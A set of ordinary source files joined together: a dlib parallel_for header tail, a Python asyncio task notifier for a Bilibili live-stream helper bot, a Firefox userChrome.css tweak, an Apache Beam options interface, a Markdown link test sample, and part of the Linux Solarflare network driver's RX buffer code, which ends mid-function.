long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
- It will also use the default_thread_pool().
!*/
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long,long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long,long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
- It will also use the default_thread_pool()
!*/
// ----------------------------------------------------------------------------------------
}
#endif // DLIB_PARALLEL_FoR_ABSTRACT_Hh_
| {
"pile_set_name": "Github"
} |
import asyncio
import random
from typing import Optional, Callable
import aiojobs
import bili_statistics
from user.user import User
from tasks.base_class import TaskType, UniqueType, How2Call
from printer import info as print
class Users:
__slots__ = ('_users', '_global_task_control', '_global_task_arrangement', '_dict_bili', '_force_sleep')
def __init__(self,
global_task_control: dict, global_task_arrangement: dict,
dict_bili: dict, force_sleep: Callable):
self._users = []
self._global_task_control = global_task_control
self._global_task_arrangement = global_task_arrangement
self._dict_bili = dict_bili
self._force_sleep = force_sleep
@property
def superuser(self) -> User:
return self._users[0]
def gets_with_restrict(self, index: int, task):
task_name = task.TASK_NAME
for user in self.gets(index):
if user.is_in_jail and task_name in (
'recv_heart_gift',
'open_silver_box',
'join_storm_raffle',
'join_guard_raffle',
'join_tv_raffle',
'join_pk_raffle'
):
continue
if task_name != 'null': # null 就忽略过滤,直接参与
if f'probability_{task_name}' in user.task_arrangement: # 平均概率筛选
if not random.random() < user.task_arrangement[f'probability_{task_name}']:
continue
if not bili_statistics.add2max_time_task_checkers( # 每日次数筛选
user_id=user.id,
task=task,
max_time=user.task_arrangement.get(task_name, -1)):
continue
yield user
# async 只是为了 User 里面的 aiohttp 的 session;即使切了也没啥吧,append 的时候不切换协程,对 notifier 运行中不会造成什么影响
async def add_user(self, user_info: dict, custom_task_control: dict, custom_task_arrangement: dict):
task_control = {**self._global_task_control, **custom_task_control}
task_arrangement = {**self._global_task_arrangement, **custom_task_arrangement}
user = User(
dict_user=user_info,
task_ctrl=task_control,
task_arrangement=task_arrangement,
dict_bili=self._dict_bili,
force_sleep=self._force_sleep)
self._users.append(user)
def gets(self, index: int):
if index == -2:
for user in self._users:
yield user
return
user = self._users[index]
yield user
class Notifier:
__slots__ = ('_loop', '_users', '_scheduler',)
def __init__(self, loop=None):
if loop is None:
self._loop = asyncio.get_event_loop()
else:
self._loop = loop
self._users: Optional[Users] = None
self._scheduler: Optional[aiojobs.Scheduler] = None
def init(self, users: Users):
self._users = users
async def add_user(self, **kwargs):
await self._users.add_user(**kwargs)
# pause 和 resume 必须在同一个循环里面用,否则可能发生类似线程不安全的东西
async def resume(self):
if self._scheduler is None:
self._scheduler = await aiojobs.create_scheduler()
async def pause(self):
if self._scheduler is not None and not self._scheduler.closed:
scheduler = self._scheduler
self._scheduler = None
await scheduler.close()
@staticmethod
async def _unique_work(user: User, task, func: Callable, *args, **kwargs):
if bili_statistics.start_unique_task(user.id, task):
try:
result = await func(user, *args, **kwargs)
bili_statistics.done_unique_task(user.id, task)
return result
except asyncio.CancelledError:
print(f'CONFIRMED CANCEL {user} {func}')
bili_statistics.cancel_unique_task(user.id, task)
else:
print(f'重复推送{func} {user.id}(此为debug信息忽略即可)')
return None
@staticmethod
async def _multi_work(user: User, _, func: Callable, *args, **kwargs):
try:
return await func(user, *args, **kwargs)
except asyncio.CancelledError:
print(f'CONFIRMED CANCEL {user} {func}')
return None
async def run_sched_func(self, func: Callable, *args, **kwargs):
scheduler = self._scheduler
if scheduler is not None and not scheduler.closed:
await scheduler.spawn(func(*args, **kwargs))
# 这里是为了日常任务的check问题
async def run_sched_func_with_return(self, func: Callable, *args, **kwargs):
scheduler = self._scheduler
if scheduler is not None and not scheduler.closed:
return await func(*args, **kwargs)
def run_sched_func_bg(self, *args, **kwargs):
self._loop.create_task(self.run_sched_func(*args, **kwargs))
@staticmethod
async def run_forced_func(func: Callable, *args, **kwargs):
return await func(*args, **kwargs)
def run_forced_func_bg(self, *args, **kwargs):
self._loop.create_task(self.run_forced_func(*args, **kwargs))
async def _dont_wait(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
_):
for user_id, delay_range, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
delay = random.uniform(*delay_range)
self._loop.call_later(
delay, handle_work, handle_unique, user, task, func_work, *args)
async def _wait(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
return_results: bool):
if not return_results:
for user_id, _, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
await handle_work(handle_unique, user, task, func_work, *args)
return None
results = []
for user_id, _, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
results.append(await handle_work(handle_unique, user, task, func_work, *args))
return results
async def _wait_and_pass(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
return_results: bool):
if not return_results:
for user_id, _, *args in check_results:
result = args
for user in self._users.gets_with_restrict(user_id, task):
result = await handle_work(handle_unique, user, task, func_work, *result)
return None
results = []
for user_id, _, *args in check_results:
result = args
for user in self._users.gets_with_restrict(user_id, task):
result = await handle_work(handle_unique, user, task, func_work, *(result[-1]))
results.append(result[:-1])
return results
'''
设有 task 参数传入。是传一个类,而不是实例对象!
class Task:
async def check()
async def 工作函数() # work / webconsole_work / cmdconsole_work
'''
# handle_check notifier 执行 task.check 函数时的包裹函数
# handle_works notifier 执行 task 的"工作函数"时的包裹函数
# handle_work 执行具体每个 user 的"工作函数"时外层包裹函数,WAIT WAIT_AND_PASS 时无效,一定是forced的
# handle_unique 执行具体每个 user 的"工作函数时"时内层包裹函数 _unique_work / _multi_work
# func_work "工作函数" eg: task.work
async def exec_task(self, task, *args, **kwargs):
handle_check = None
handle_works = None
handle_work = None
func_work = None
handle_unique = None
need_results = None
if task.TASK_TYPE == TaskType.SCHED:
handle_check = self.run_sched_func_with_return
func_work = task.work
need_results = False
elif task.TASK_TYPE == TaskType.FORCED:
handle_check = self.run_forced_func
func_work = task.work
need_results = False
elif task.TASK_TYPE == TaskType.CONSOLE:
handle_check = self.run_forced_func
ctrl, *args = args # 此时ctrl隐含在args中
if ctrl == 'web':
func_work = task.web_console_work
need_results = True
elif ctrl == 'cmd':
func_work = task.cmd_console_work
need_results = False
if task.HOW2CALL == How2Call.DONT_WAIT:
handle_works = self._dont_wait
if task.TASK_TYPE == TaskType.SCHED:
handle_work = self.run_sched_func_bg
else:
handle_work = self.run_forced_func_bg
elif task.HOW2CALL == How2Call.WAIT:
handle_works = self._wait
handle_work = self.run_forced_func
elif task.HOW2CALL == How2Call.WAIT_AND_PASS:
handle_works = self._wait_and_pass
handle_work = self.run_forced_func
if task.UNIQUE_TYPE == UniqueType.MULTI:
handle_unique = self._multi_work
elif task.UNIQUE_TYPE == UniqueType.UNIQUE:
handle_unique = self._unique_work
check_results = await handle_check(task.check, self._users.superuser, *args, **kwargs)
print('check_results:', task, check_results)
if check_results is not None:
return await handle_works(task, handle_work, handle_unique, func_work, check_results, need_results)
async def exec_func(self, func: Callable, *args, **kwargs):
return await func(self._users.superuser, *args, **kwargs)
def exec_task_no_wait(self, task, *args, **kwargs):
self._loop.create_task(self.exec_task(task, *args, **kwargs))
def get_users(self, user_id: int):
return self._users.gets(user_id)
var_notifier = Notifier()
def init(**kwargs):
var_notifier.init(**kwargs)
async def exec_task(task, *args, **kwargs):
return await var_notifier.exec_task(task, *args, **kwargs)
def exec_task_no_wait(task, *args, **kwargs):
var_notifier.exec_task_no_wait(task, *args, **kwargs)
async def exec_func(func: Callable, *args, **kwargs):
return await var_notifier.exec_func(func, *args, **kwargs)
async def pause():
await var_notifier.pause()
async def resume():
await var_notifier.resume()
async def add_user(**kwargs):
await var_notifier.add_user(**kwargs)
def get_users(user_id: int):
return var_notifier.get_users(user_id)
| {
"pile_set_name": "Github"
} |
/* Firefox Quantum userChrome.css tweaks ************************************************/
/* Github: https://github.com/aris-t2/customcssforfx ************************************/
/****************************************************************************************/
@import "./addonlists_compact.css";
#addons-page .addon{
padding: 0 4px !important;
} | {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.beam.sdk.options;
import com.google.auto.service.AutoService;
import org.apache.beam.sdk.annotations.Experimental;
import org.apache.beam.sdk.annotations.Experimental.Kind;
import org.apache.beam.vendor.guava.v26_0_jre.com.google.common.collect.ImmutableList;
/** Options that are used to control configuration of the remote environment. */
@Experimental(Kind.PORTABILITY)
@Hidden
public interface RemoteEnvironmentOptions extends PipelineOptions {
// The default should be null (no default), so that the environment can pick its suitable tmp
// directory when nothing is specified by the user
@Description("Local semi-persistent directory")
String getSemiPersistDir();
void setSemiPersistDir(String value);
/** Register the {@link RemoteEnvironmentOptions}. */
@AutoService(PipelineOptionsRegistrar.class)
class Options implements PipelineOptionsRegistrar {
@Override
public Iterable<Class<? extends PipelineOptions>> getPipelineOptions() {
return ImmutableList.of(RemoteEnvironmentOptions.class);
}
}
}
| {
"pile_set_name": "Github"
} |
Alternative delimiters for [link definitions][link1] are allowed -- as of
Markdown 1.0.2, I think. Hence, [this link][link2] and [this link][link3] work
too.
[link1]: http://daringfireball.net/projects/markdown/syntax#link "link syntax"
[link2]: http://daringfireball.net/projects/markdown/syntax#link 'link syntax'
[link3]: http://daringfireball.net/projects/markdown/syntax#link (link syntax)
| {
"pile_set_name": "Github"
} |
/****************************************************************************
* Driver for Solarflare network controllers and boards
* Copyright 2005-2006 Fen Systems Ltd.
* Copyright 2005-2013 Solarflare Communications Inc.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation, incorporated herein by reference.
*/
#include <linux/socket.h>
#include <linux/in.h>
#include <linux/slab.h>
#include <linux/ip.h>
#include <linux/ipv6.h>
#include <linux/tcp.h>
#include <linux/udp.h>
#include <linux/prefetch.h>
#include <linux/moduleparam.h>
#include <linux/iommu.h>
#include <net/ip.h>
#include <net/checksum.h>
#include "net_driver.h"
#include "efx.h"
#include "filter.h"
#include "nic.h"
#include "selftest.h"
#include "workarounds.h"
/* Preferred number of descriptors to fill at once */
#define EFX_RX_PREFERRED_BATCH 8U
/* Number of RX buffers to recycle pages for. When creating the RX page recycle
* ring, this number is divided by the number of buffers per page to calculate
* the number of pages to store in the RX page recycle ring.
*/
#define EFX_RECYCLE_RING_SIZE_IOMMU 4096
#define EFX_RECYCLE_RING_SIZE_NOIOMMU (2 * EFX_RX_PREFERRED_BATCH)
/* Size of buffer allocated for skb header area. */
#define EFX_SKB_HEADERS 128u
/* This is the percentage fill level below which new RX descriptors
* will be added to the RX descriptor ring.
*/
static unsigned int rx_refill_threshold;
/* Each packet can consume up to ceil(max_frame_len / buffer_size) buffers */
#define EFX_RX_MAX_FRAGS DIV_ROUND_UP(EFX_MAX_FRAME_LEN(EFX_MAX_MTU), \
EFX_RX_USR_BUF_SIZE)
/*
* RX maximum head room required.
*
* This must be at least 1 to prevent overflow, plus one packet-worth
* to allow pipelined receives.
*/
#define EFX_RXD_HEAD_ROOM (1 + EFX_RX_MAX_FRAGS)
static inline u8 *efx_rx_buf_va(struct efx_rx_buffer *buf)
{
return page_address(buf->page) + buf->page_offset;
}
static inline u32 efx_rx_buf_hash(struct efx_nic *efx, const u8 *eh)
{
#if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS)
return __le32_to_cpup((const __le32 *)(eh + efx->rx_packet_hash_offset));
#else
const u8 *data = eh + efx->rx_packet_hash_offset;
return (u32)data[0] |
(u32)data[1] << 8 |
(u32)data[2] << 16 |
(u32)data[3] << 24;
#endif
}
static inline struct efx_rx_buffer *
efx_rx_buf_next(struct efx_rx_queue *rx_queue, struct efx_rx_buffer *rx_buf)
{
if (unlikely(rx_buf == efx_rx_buffer(rx_queue, rx_queue->ptr_mask)))
return efx_rx_buffer(rx_queue, 0);
else
return rx_buf + 1;
}
static inline void efx_sync_rx_buffer(struct efx_nic *efx,
struct efx_rx_buffer *rx_buf,
unsigned int len)
{
dma_sync_single_for_cpu(&efx->pci_dev->dev, rx_buf->dma_addr, len,
DMA_FROM_DEVICE);
}
void efx_rx_config_page_split(struct efx_nic *efx)
{
efx->rx_page_buf_step = ALIGN(efx->rx_dma_len + efx->rx_ip_align,
EFX_RX_BUF_ALIGNMENT);
efx->rx_bufs_per_page = efx->rx_buffer_order ? 1 :
((PAGE_SIZE - sizeof(struct efx_rx_page_state)) /
efx->rx_page_buf_step);
efx->rx_buffer_truesize = (PAGE_SIZE << efx->rx_buffer_order) /
efx->rx_bufs_per_page;
efx->rx_pages_per_batch = DIV_ROUND_UP(EFX_RX_PREFERRED_BATCH,
efx->rx_bufs_per_page);
}
/* Check the RX page recycle ring for a page that can be reused. */
static struct page *efx_reuse_page(struct efx_rx_queue *rx_queue)
{
struct efx_nic *efx = rx_queue->efx;
struct page *page;
struct efx_rx_page_state *state;
unsigned index;
index = rx_queue->page_remove & rx_queue->page_ptr_mask;
page = rx_queue->page_ring[index];
if (page == NULL)
return NULL;
rx_queue->page_ring[index] = NULL;
/* page_remove cannot exceed page_add. */
if (rx_queue->page_remove != rx_queue->page_add)
++rx_queue->page_remove;
/* If page_count is 1 then we hold the only reference to this page. */
if (page_count(page) == 1) {
++rx_queue->page_recycle_count;
return page;
} else {
state = page_address(page);
dma_unmap_page(&efx->pci_dev->dev, state->dma_addr,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
put_page(page);
++rx_queue->page_recycle_failed;
}
return NULL;
}
/**
* efx_init_rx_buffers - create EFX_RX_BATCH page-based RX buffers
*
* @rx_queue: Efx RX queue
*
* This allocates a batch of pages, maps them for DMA, and populates
* struct efx_rx_buffers for each one. Return a negative error code or
* 0 on success. If a single page can be used for multiple buffers,
* then the page will either be inserted fully, or not at all.
*/
static int efx_init_rx_buffers(struct efx_rx_queue *rx_queue, bool atomic)
{
struct efx_nic *efx = rx_queue->efx;
struct efx_rx_buffer *rx_buf;
struct page *page;
unsigned int page_offset;
struct efx_rx_page_state *state;
dma_addr_t dma_addr;
unsigned index, count;
count = 0;
do {
page = efx_reuse_page(rx_queue);
if (page == NULL) {
page = alloc_pages(__GFP_COLD | __GFP_COMP |
(atomic ? GFP_ATOMIC : GFP_KERNEL),
efx->rx_buffer_order);
if (unlikely(page == NULL))
return -ENOMEM;
dma_addr =
dma_map_page(&efx->pci_dev->dev, page, 0,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
if (unlikely(dma_mapping_error(&efx->pci_dev->dev,
dma_addr))) {
__free_pages(page, efx->rx_buffer_order);
return -EIO;
}
state = page_address(page);
state->dma_addr = dma_addr;
} else {
state = page_address(page);
dma_addr = state->dma_addr;
}
dma_addr += sizeof(struct efx_rx_page_state);
page_offset = sizeof(struct efx_rx_page_state);
do {
index = rx_queue->added_count & rx_queue->ptr_mask;
rx_buf = efx_rx_buffer(rx_queue, index);
rx_buf->dma_addr = dma_addr + efx->rx_ip_align;
rx_buf->page = page;
rx_buf->page_offset = page_offset + efx->rx_ip_align;
rx_buf->len = efx->rx_dma_len;
rx_buf->flags = 0;
++rx_queue->added_count;
get_page(page);
dma_addr += efx->rx_page_buf_step;
page_offset += efx->rx_page_buf_step;
} while (page_offset + efx->rx_page_buf_step <= PAGE_SIZE);
rx_buf->flags = EFX_RX_BUF_LAST_IN_PAGE;
} while (++count < efx->rx_pages_per_batch);
return 0;
}
/* Unmap a DMA-mapped page. This function is only called for the final RX
* buffer in a page.
*/
static void efx_unmap_rx_buffer(struct efx_nic *efx,
struct efx_rx_buffer *rx_buf)
{
struct page *page = rx_buf->page;
if (page) {
struct efx_rx_page_state *state = page_address(page);
dma_unmap_page(&efx->pci_dev->dev,
state->dma_addr,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
}
}
static void efx_free_rx_buffers(struct efx_rx_queue *rx_queue,
struct efx_rx_buffer *rx_buf,
unsigned int num_bufs)
{
do {
if (rx_buf->page) {
put_page(rx_buf->page);
rx_buf->page = NULL;
}
rx_buf = efx_rx_buf_next(rx_queue, rx_buf);
} while (--num_bufs);
}
/* Attempt to recycle the page if there is an RX recycle ring; the page can
* only be added if this is the final RX buffer, to prevent pages being used in
* the descriptor ring and appearing in the recycle ring simultaneously.
*/
static void efx_recycle_rx_page(struct efx_channel *channel,
struct efx_rx_buffer *rx_buf)
{
struct page *page = rx_buf->page;
struct efx_rx_queue *rx_queue = efx_channel_get_rx_queue(channel);
struct efx_nic *efx = rx_queue->efx;
unsigned index;
/* Only recycle the page after processing the final buffer. */
if (!(rx_buf->flags & EFX_RX_BUF_LAST_IN_PAGE))
return;
index = rx_queue->page_add & rx_queue->page_ptr_mask;
if (rx_queue->page_ring[index] == NULL) {
unsigned read_index = rx_queue->page_remove &
rx_queue->page_ptr_mask;
/* The next slot in the recycle ring is available, but
* increment page_remove if the read pointer currently
* points here.
*/
if (read_index == index)
++rx_queue->page_remove;
rx_queue->page_ring[index] = page;
++rx_queue->page_add;
return;
}
++rx_queue->page_recycle_full;
efx_unmap_rx_buffer(efx, rx_buf);
put_page(rx_buf->page);
}
static void efx_fini_rx_buffer(struct efx_rx_queue *rx_queue,
struct efx_rx_buffer *rx_buf)
{
/* Release the page reference we hold for the buffer. */
if (rx_buf->page)
put_page(rx_buf->page);
/* If this is the last buffer in a page, unmap and free it. */
if (rx_buf->flags & EFX_RX_BUF_LAST_IN_PAGE) {
efx_unmap_rx_buffer(rx_queue->efx, rx_buf);
efx_free_rx_buffers(rx_queue, rx_buf, 1);
}
rx_buf->page = NULL;
}
/* Recycle the pages that are used by buffers that have just been received. */
static void efx_recycle_rx_pages(struct efx_channel *channel,
struct efx_rx_buffer *rx_buf,
unsigned int n_frags)
{
struct efx_rx_queue *rx_queue = efx_channel_get_rx_queue(channel);
do {
efx_recycle_rx_page(channel, rx_buf);
rx_buf = efx_rx_buf_next(rx_queue, rx_buf);
} while (--n_frags);
}
static void efx_discard_rx_packet(struct efx_channel *channel,
struct efx_rx_buffer *rx_buf,
unsigned int n_frags)
{
struct efx_rx_queue *rx_queue = efx_channel_get_rx_queue(channel);
efx_recycle_rx_pages(channel, rx_buf, n_frags);
efx_free_rx_buffers(rx_queue, rx_buf, n_frags);
}
/**
* efx_fast_push_rx_descriptors - push new RX descriptors quickly
* @rx_queue: RX descriptor queue
*
* This will aim to fill the RX descriptor queue up to
* @rx_queue->@max_fill. If there is insufficient atomic
* memory to do so, a slow fill will be scheduled.
*
* The caller must provide serialisation (none is used here). In practise,
* this means this function must run from the NAPI handler, or be called
* when NAPI is disabled.
*/
void efx_fast_push_rx_descriptors(struct efx_rx_queue *rx_queue, bool atomic)
{
struct efx_nic *efx = rx_queue->efx;
unsigned int fill_level, batch_size;
int space, rc = 0;
if (!rx_queue->refill_enabled)
return;
/* Calculate current fill level, and exit if we don't need to fill */
fill_level = (rx_queue->added_count - rx_queue->removed_count);
EFX_WARN_ON_ONCE_PARANOID(fill_level > rx_queue->efx->rxq_entries);
if (fill_level >= rx_queue->fast_fill_trigger)
goto out;
/* Record minimum fill level */
if (unlikely(fill_level < rx_queue->min_fill)) {
if (fill_level)
rx_queue->min_fill = fill_level;
}
batch_size = efx->rx_pages_per_batch * efx->rx_bufs_per_page;
space = rx_queue->max_fill - fill_level;
EFX_WARN_ON_ONCE_PARANOID(space < batch_size);
netif_vdbg(rx_queue->efx, rx_status, rx_queue->efx->net_dev,
"RX queue %d fast-filling descriptor ring from"
" level %d to level %d\n",
efx_rx_queue_index(rx_queue), fill_level,
rx_queue->max_fill);
do {
rc = efx_init_rx_buffers(rx_queue, atomic);
if (unlikely(rc)) {
/* Ensure that we don't leave the rx queue empty */
if (rx_queue->added_count == rx_queue->removed_count)
efx_schedule_slow_fill(rx_queue);
goto out;
}
} while ((space -= batch_size) >= batch_size);
netif_vdbg(rx_queue->efx, rx_status, rx_queue->efx->net_dev,
"RX queue %d fast-filled descriptor ring "
"to level %d\n", efx_rx_queue_index(rx_queue),
rx_queue->added_count - rx_queue->removed_count);
out:
if (rx_queue->notified_count != rx_queue->added_count)
efx_nic_notify_rx_desc(rx_queue);
}
void efx_rx_slow_fill(unsigned long context)
{
struct efx_rx_queue *rx_queue = (struct efx_rx_queue *)context;
/* Post an event to cause NAPI to run and refill the queue */
efx_nic_generate_fill_event(rx_queue);
++rx_queue->slow_fill_count;
}
static void efx_rx_packet__check_len(struct efx_rx_queue *rx_queue,
struct efx_rx_buffer *rx_buf,
int len)
{
struct efx_nic *efx = rx_queue->efx;
unsigned max_len = rx_buf->len - efx->type->rx_buffer_padding;
if (likely(len <= max_len))
return;
/* The packet must be discarded, but this is only a fatal error
* if the caller indicated it was
*/
rx_buf->flags |= EFX_RX_PKT_DISCARD;
if (net_ratelimit())
netif_err(efx, rx_err, efx->net_dev,
"RX queue %d overlength RX event (%#x > %#x)\n",
efx_rx_queue_index(rx_queue), len, max_len);
efx_rx_queue_channel(rx_queue)->n_rx_overlength++;
}
/* Pass a received packet up through GRO. GRO can handle pages
* regardless of checksum state and skbs with a good checksum.
*/
static void
efx_rx_packet_gro(struct efx_channel *channel, struct efx_rx_buffer *rx_buf,
unsigned int n_frags, u8 *eh)
{
struct napi_struct *napi = &channel->napi_str;
gro_result_t gro_result;
struct efx_nic *efx = channel->efx;
struct sk_buff *skb;
skb = napi_get_frags(napi);
if (unlikely(!skb)) {
struct efx_rx_queue *rx_queue;
rx_queue = efx_channel_get_rx_queue(channel);
efx_free_rx_buffers(rx_queue, rx_buf, n_frags);
return;
}
if (efx->net_dev->features & NETIF_F_RXHASH)
skb_set_hash(skb, efx_rx_buf_hash(efx, eh),
PKT_HASH_TYPE_L3);
skb->ip_summed = ((rx_buf->flags & EFX_RX_PKT_CSUMMED) ?
CHECKSUM_UNNECESSARY : CHECKSUM_NONE);
skb->csum_level = !!(rx_buf->flags & EFX_RX_PKT_CSUM_LEVEL);
for (;;) {
skb_fill_page_desc(skb, skb_shinfo(skb)->nr_frags,
rx_buf->page, rx_buf->page_offset,
rx_buf->len);
rx_buf->page = NULL;
skb->len += rx_buf->len;
if (skb_shinfo(skb)->nr_frags == n_frags)
break;
rx_buf = efx_rx_buf_next(&channel->rx_queue, rx_buf);
}
skb->data_len = skb->len;
skb->truesize += n_frags * efx->rx_buffer_truesize;
skb_record_rx_queue(skb, channel->rx_queue.core_index);
gro_result = napi_gro_frags(napi);
if (gro_result != GRO_DROP)
channel->irq_mod_score += 2;
}
/* Allocate and construct an SKB around page fragments */
static struct sk_buff *efx_rx_mk_skb(struct efx_channel *channel,
struct efx_rx_buffer *rx_buf,
unsigned int n_frags,
u8 *eh, int hdr_len)
{
struct efx_nic *efx = channel->efx;
struct sk_buff *skb;
/* Allocate an SKB to store the headers */
skb = netdev_alloc_skb(efx->net_dev,
efx->rx_ip_align + efx->rx_prefix_size +
hdr_len);
if (unlikely(skb == NULL)) {
atomic_inc(&efx->n_rx_noskb_drops);
return NULL;
}
EFX_WARN_ON_ONCE_PARANOID(rx_buf->len < hdr_len);
memcpy(skb->data + efx->rx_ip_align, eh - efx->rx_prefix_size,
efx->rx_prefix_size + hdr_len);
skb_reserve(skb, efx->rx_ip_align + efx->rx_prefix_size);
__skb_put(skb, hdr_len);
/* Append the remaining page(s) onto the frag list */
if (rx_buf->len > hdr_len) {
rx_buf->page_offset += hdr_len;
rx_buf->len -= hdr_len;
for (;;) {
skb_fill_page_desc(skb, skb_shinfo(skb)->nr_frags,
rx_buf->page, rx_buf->page_offset,
rx_buf->len);
rx_buf->page = NULL;
skb->len += rx_buf->len;
skb->data_len += rx_buf->len;
if (skb_shinfo(skb)->nr_frags == n_frags)
break;
rx_buf = efx_rx_buf_next(&channel->rx_queue, rx_buf);
}
} else {
__free_pages(rx_buf->page, efx->rx_buffer_order);
rx_buf->page = NULL;
n_frags = 0;
}
skb->truesize += n_frags * efx->rx_buffer_truesize;
/* Move past the ethernet header */
skb->protocol = eth_type_trans(skb, efx->net_dev);
skb_mark_napi_id(skb, &channel->napi_str);
return skb;
}
void efx_rx_packet(struct efx_rx_queue *rx_queue, unsigned int index,
unsigned int n_frags, unsigned int len, u16 flags)
{
struct efx_nic *efx = rx_queue->efx;
struct efx_channel *channel = efx_rx_queue_channel(rx_queue);
struct efx_rx_buffer *rx_buf;
rx_queue->rx_packets++;
rx_buf = efx_rx_buffer(rx_queue, index);
rx_buf->flags |= flags;
/* Validate the number of fragments and completed length */
if (n_frags == 1) {
if (!(flags & EFX_RX_PKT_PREFIX_LEN))
efx_rx_packet__check_len(rx_queue, rx_buf, len);
} else if (unlikely(n_frags > EFX_RX_MAX_FRAGS) ||
unlikely(len <= (n_frags - 1) * efx->rx_dma_len) ||
unlikely(len > n_frags * efx->rx_dma_len) ||
unlikely(!efx->rx_scatter)) {
/* If this isn't an explicit discard request, either
* the hardware or the driver is broken.
*/
WARN_ON(!(len == 0 && rx_buf->flags & EFX_RX_PKT_DISCARD));
rx_buf->flags |= EFX_RX_PKT_DISCARD;
}
netif_vdbg(efx, rx_status, efx->net_dev,
"RX queue %d received ids %x-%x len %d %s%s\n",
efx_rx_queue_index(rx_queue), index,
(index + n_frags - 1) & rx_queue->ptr_mask, len,
(rx_buf->flags & EFX_RX_PKT_CSUMMED) ? " [SUMMED]" : "",
(rx_buf->flags & EFX_RX_PKT_DISCARD) ? " [DISCARD]" : "");
/* Discard packet, if instructed to do so. Process the
* previous receive first.
*/
if (unlikely(rx_buf->flags & EFX_RX_PKT_DISCARD)) {
efx_rx_flush_packet(channel);
efx_discard_rx_packet(channel, rx_buf, n_frags);
return;
}
if (n_frags == 1 && !(flags & EFX_RX_PKT_PREFIX_LEN))
rx_buf->len = len;
/* Release and/or sync the DMA mapping - assumes all RX buffers
* consumed in-order per RX queue.
*/
efx_sync_rx_buffer(efx, rx_buf, rx_buf->len);
/* Prefetch nice and early so data will (hopefully) be in cache by
* the time we look at it.
*/
prefetch(efx_rx_buf_va(rx_buf));
rx_buf->page_offset += efx->rx_prefix_size;
rx_buf->len -= efx->rx_prefix_size;
if (n_frags > 1) {
/* Release/sync DMA mapping for additional fragments.
* Fix length for last fragment.
*/
unsigned int tail_frags = n_frags - 1;
for (;;) {
rx_buf = efx_rx_buf_next(rx_queue, rx_buf);
if (--tail_frags == 0)
break;
efx_sync_rx_buffer(efx, rx_buf, efx->rx_dma_len);
}
rx_buf->len = len - (n_frags - 1) * efx->rx_dma_len;
efx_sync_rx_buffer(efx, rx_buf, rx_buf->len);
}
/* All fragments have been DMA-synced, so recycle pages. */
rx_buf = efx_rx_buffer(rx_queue, index);
efx_recycle_rx_pages(channel, rx_buf, n_frags);
/* Pipeline receives so that we give time for packet headers to be
* prefetched into cache.
*/
efx_rx_flush_packet(channel);
channel->rx_pkt_n_frags = n_frags;
channel->rx_pkt_index = index;
}
static void efx_rx_deliver(struct efx_channel *channel, u8 *eh,
struct efx_rx_buffer *rx_buf,
unsigned int n_frags)
{
struct sk_buff *skb;
u16 hdr_len = min_t(u16, rx_buf->len, EFX_SKB_HEADERS);
skb = efx_rx_mk_skb(channel, rx_buf, n_frags, eh, hdr_len);
if (unlikely(skb == NULL)) {
struct efx_rx_queue *rx_queue;
rx_queue = efx_channel_get_rx_queue(channel);
efx_free_rx_buffers(rx_queue, rx_buf, n_frags);
return;
}
